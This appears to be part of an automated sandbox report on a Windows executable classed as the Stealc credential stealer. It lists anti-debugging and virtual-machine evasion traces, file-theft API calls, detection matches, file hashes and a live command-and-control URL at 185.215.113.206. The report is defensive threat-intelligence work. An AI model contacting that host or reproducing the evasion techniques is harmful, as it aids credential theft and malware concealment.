                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDB84 second address: 13CDB98 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5DDh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDCD1 second address: 13CDD07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F9EA4BB43CBh 0x0000000d jmp 00007F9EA4BB43D8h 0x00000012 popad 0x00000013 jc 00007F9EA4BB43E8h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CDD07 second address: 13CDD0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DDDC9 second address: 13DDDEA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F9EA4BB43CFh 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007F9EA4BB43C6h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DDDEA second address: 13DDDEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DCD55 second address: 13DCD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DCD5B second address: 13DCD5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD66B second address: 13DD683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9EA4BB43D4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD94C second address: 13DD950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD950 second address: 13DD956 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD956 second address: 13DD963 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD963 second address: 13DD969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD969 second address: 13DD96F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD96F second address: 13DD977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD977 second address: 13DD98D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DD98D second address: 13DD996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E092B second address: 13E095B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9EA509B5E2h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E0A4D second address: 13E0A52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1F2F second address: 13E1F39 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9EA509B5DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E3BE5 second address: 13E3C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 jmp 00007F9EA4BB43D2h 0x0000000d jmp 00007F9EA4BB43D9h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56904AB second address: 56904BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9EA509B5DCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690528 second address: 569056C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 pushfd 0x00000006 jmp 00007F9EA4BB43D2h 0x0000000b or ax, DCA8h 0x00000010 jmp 00007F9EA4BB43CBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F9EA4BB43D5h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569056C second address: 5690599 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9EA509B5E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9EA509B5E3h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5690599 second address: 569059F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 569059F second address: 56905A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56905A5 second address: 56905A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 56905A9 second address: 56905B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 114DAC8 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12EB679 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12F84C0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-39161
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E740F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00E740F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E6E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E747C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00E747C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E6F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E61710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E61710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E6DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E74B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E74B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E73B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00E73B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E6BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E6EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E6DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E6DF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E61160 GetSystemInfo,ExitProcess,0_2_00E61160
                Source: file.exe, file.exe, 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2114601767.0000000001792000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWb$3%
                Source: file.exe, 00000000.00000002.2114601767.0000000001792000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2114601767.0000000001762000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37977
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37974
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37996
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37988
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37861
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-38028
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E64610 VirtualProtect ?,00000004,00000100,000000000_2_00E64610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E79BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E79BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E79AA0 mov eax, dword ptr fs:[00000030h]0_2_00E79AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E77690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00E77690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1716, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E79790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00E79790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E798E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00E798E0
                Source: file.exe, file.exe, 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA75A8 cpuid 0_2_00EA75A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00E77D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E76BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00E76BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E779E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00E779E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E77BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00E77BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.e60000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2073513483.0000000005530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1716, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.e60000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2073513483.0000000005530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1716, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/6c4adf523b719729.phpCfile.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.phpsfile.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/6c4adf523b719729.php/file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206file.exe, 00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown
                            http://185.215.113.206/:file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206/6c4adf523b719729.php;file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000003.2073513483.000000000555B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.206
                                		unknownPortugal
                                		206894WHOLESALECONNECTIONSNLtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1543870
                                Start date and time:2024-10-28 15:27:05 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 25s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:2
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 128
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • VT rate limit hit for: file.exe

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                Bjl3geiFEK.exeGet hashmaliciousPhorpiexBrowse
                                • 185.215.113.66
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaCBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.9611732743201955
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:2'151'424 bytes
                                MD5:15716110ba606bed84e305d1d8525eba
                                SHA1:a51087861dc45958cd52acec71d7255c36398aa1
                                SHA256:14e0eab38beddaf7adc2997b84bd7777d2ccb898de7f9ce5afe1c0e6008c87f1
                                SHA512:cc1a71a264084664396fa8208b07deca6e2b20e28db7544d11a9218413e803bb4ec3c2c6c402df4cf59ae49d6aaeed2051e58bf1373a591e9dcdb7a376466a51
                                SSDEEP:49152:/wJ0lh3lfZWR2hn4acruXLOENIBUVlz5bzRGgeesOrPzR:4C9zyauuXLsUVlzNqWrPz
                                TLSH:94A533199B5DCFBEEA0FA6FA109BFEFA7DB55704BAC48A1D5D0506B05840B60B08C44F
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0xb33000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                TLS Callbacks:
